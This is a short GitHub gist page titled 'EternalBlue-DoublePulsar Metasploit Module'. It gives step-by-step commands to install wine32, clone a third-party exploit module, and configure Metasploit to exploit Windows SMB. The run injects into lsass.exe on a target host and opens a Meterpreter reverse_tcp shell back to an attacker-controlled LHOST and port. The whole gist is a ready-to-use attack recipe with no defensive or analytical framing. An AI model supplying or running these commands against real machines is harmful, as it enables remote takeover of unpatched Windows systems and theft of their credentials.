Created
October 14, 2017 05:01
-
-
Save hva314/904d7bf8d03149178087092f329763c4 to your computer and use it in GitHub Desktop.
EternalBlue-DoublePulsar Metasploit Module
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## setting up wine32 | |
dpkg --add-architecture i386 | |
apt-get update | |
apt-get install wine32 | |
mkdir -p /root/.wine/drive_c/ | |
## get doublepulsar module for metasploit | |
mkdir -p /root/.msf4/modules/exploits/windows/smb/ | |
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git /root/.msf4/modules/exploits/windows/smb/ | |
## metaspsloit | |
msf > use exploit/windows/smb/eternalblue_doublepulsar | |
> set DOUBLEPULSARPATH /root/.msf4/modules/exploits/windows/smb/deps | |
> set ETERNALBLUEPATH /root/.msf4/modules/exploits/windows/smb/deps | |
> set PROCESSINJECT lsass.exe | |
> set RHOST 192.168.1.7 | |
> set TARGETARCHITECTURE x64 | |
> set payload windows/x64/meterpreter/reverse_tcp | |
> set LHOST 192.168.1.254 | |
> set LPORT 7554 | |
> exploit -j |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment